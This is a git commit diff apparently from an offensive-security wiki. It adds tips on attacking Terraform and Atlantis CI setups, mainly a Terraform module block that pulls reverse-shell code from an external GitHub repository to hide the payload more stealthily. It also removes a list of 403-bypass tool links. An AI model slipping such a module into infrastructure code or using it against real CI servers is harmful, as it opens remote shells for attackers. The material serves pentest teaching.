GitBook: [#3117] No subject

This commit is contained in:
CPol 2022-04-21 10:57:02 +00:00 committed by gitbook-bot
parent 18d818db2f
commit e7ccfd30d5
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 12 additions and 6 deletions

View file

@ -189,6 +189,16 @@ data "external" "example" {
}
```
You can perform this attack even in a **more stealth way**, instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
```javascript
module "not_rev_shell" {
source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
}
```
You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules](https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules)
### Atlantis apply RCE - Config modification in new PR
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
@ -219,6 +229,8 @@ resource "null_resource" "rev_shell" {
}
```
As in the previous exploitation technique you could probably **load an external resource instead of writing the malicious payload** directly in the terraform file.
### Terraform Param Injection
When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like:

View file

@ -91,9 +91,3 @@ If _/path_ is blocked:
guest guest
```
{% endcode %}
## Automatic Tools
* [https://github.com/lobuhi/byp4xx](https://github.com/lobuhi/byp4xx)
* [https://github.com/iamj0ker/bypass-403](https://github.com/iamj0ker/bypass-403)
* [https://github.com/gotr00t0day/forbiddenpass](https://github.com/gotr00t0day/forbiddenpass)